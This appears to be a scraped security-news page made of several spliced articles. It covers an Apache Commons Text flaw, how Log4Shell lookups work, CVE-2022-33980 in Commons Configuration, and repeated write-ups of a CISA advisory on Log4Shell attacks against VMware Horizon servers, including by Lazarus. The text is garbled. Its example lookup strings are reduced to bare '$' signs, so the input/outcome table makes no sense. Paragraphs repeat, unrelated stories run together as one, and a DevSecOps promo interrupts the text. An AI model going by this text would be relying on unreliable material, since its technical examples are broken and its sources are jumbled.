Security News

A freshly fixed vulnerability in the Apache Commons Text library has been getting attention from security researchers these last few days, worrying it could lead to a repeat of the Log4Shell dumpster fire. The final verdict shows there's no need to panic: while the vulnerability is exploitable, "The nature of the vulnerability means that unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input," says Rapid7 AI researcher Erick Galinkin.

As you no doubt remember from Log4Shell, unnecessary "Features" in an Apache programming library called Log4J suddenly made all these scenarios possible on any server where an unpatched version of Log4J was installed. A user who pretended their name was $ , for example, would typically get logged by the Log4J code under the name of the server account doing the processing, if the app didn't take the precaution of checking for dangerous characters in the input data first.

Unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of your own security on top of Log4j, your software could come unstuck. INPUT OUTCOME ----------------- ---------------------- CURRENT=$ /$ -> CURRENT=Java version 17.0.1/Windows 10 10.0 Server account is: $ -> Server account is: root $ -> SECRETDATAINTENDEDTOBEINMEMORYONLY. Clearly, if you're accepting logging text from a trusted source, where it's reasonable to allow the loggee to control the logger by telling it to substitute plain text with chosen internal data, this sort of text rewriting is useful.

Well, the bug CVE-2022-33980, which doesn't have a catchy name yet, is a very similar sort of blunder in the Apache Commons Configuration toolkit. The name's quite a mouthful: Apache Commons is another Apache project that provides numerous Java utilities that provide a wide range of handy programming toolkits.

The Cybersecurity and Infrastructure Security Agency and Coast Guard Cyber Command released a joint advisory warning the Log4Shell flaw is being abused by threat actors that are compromising public-facing VMware Horizon and Unified Access Gateway servers. The VMware Horizon is a platform used by administrators to run and deliver virtual desktops and apps in the hybrid cloud, while UAG provides secure access to the resources residing inside a network.

Attackers still exploit Log4Shell on VMware Horizon servers, CISA warnsIf your organization is running VMware Horizon and Unified Access Gateway servers and you haven't implemented the patches or workarounds to fix/mitigate the Log4Shell vulnerability in December 2021, you should threat all those systems as compromised, the Cybersecurity and Infrastructure Security Agency has advised on Thursday. 7 DevSecOps myths and how to overcome themBy including security and compliance processes in end-to-end automation, businesses can secure software throughout the whole software supply chain, significantly improve the developer experience, and accelerate safer delivery.

If your organization is running VMware Horizon and Unified Access Gateway servers and you haven't implemented the patches or workarounds to fix/mitigate the Log4Shell vulnerability in December 2021, you should threat all those systems as compromised, the Cybersecurity and Infrastructure Security Agency has advised on Thursday. According to the CISA, cyber threat actors, including state-sponsored advanced persistent threat actors, have continued to exploit Log4Shell in unpatched, internet-facing VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations.

The U.S. Cybersecurity and Infrastructure Security Agency, along with the Coast Guard Cyber Command, on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. "Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and servers," the agencies said.

CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway servers using the Log4Shell remote code execution vulnerability. Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.

The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers. According to a report published by analysts at Ahnlab's ASEC, Lazarus has been targeting vulnerable VMware products via Log4Shell since April 2022.